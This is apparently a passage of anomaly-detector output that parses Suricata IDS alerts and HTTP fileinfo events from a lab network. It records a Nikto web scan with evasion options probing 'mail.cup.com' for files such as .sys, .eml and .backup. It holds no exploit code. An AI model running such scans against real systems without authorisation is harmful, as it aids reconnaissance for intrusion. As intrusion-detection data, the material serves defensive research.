"/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46810, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1995991545415704,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1995991545415704, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.199703+0000\",\"flow_id\":1995991545415704,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.201581 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46812 -> 192.168.10.154:80", "/parser/model/time": 1583349514.201581, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46812, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.201581 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46812 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nn", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.201869+0000\",\"flow_id\":1416587572285516,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.201869, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1416587572285516,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nn\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nn\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nn", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nn", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46812, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1416587572285516,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1416587572285516, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.201869+0000\",\"flow_id\":1416587572285516,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.203262 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46814 -> 192.168.10.154:80", "/parser/model/time": 1583349514.203262, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46814, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.203262 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46814 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.eml", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.203479+0000\",\"flow_id\":1094550924433338,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.203479, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1094550924433338,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.eml\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.eml\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.eml", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.eml", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46814, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1094550924433338,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1094550924433338, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.203479+0000\",\"flow_id\":1094550924433338,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.204806 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46816 -> 192.168.10.154:80", "/parser/model/time": 1583349514.204806, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46816, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.204806 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46816 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.backup", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.205030+0000\",\"flow_id\":733129426476444,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.20503, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":733129426476444,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.backup\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.backup\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.backup", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", 
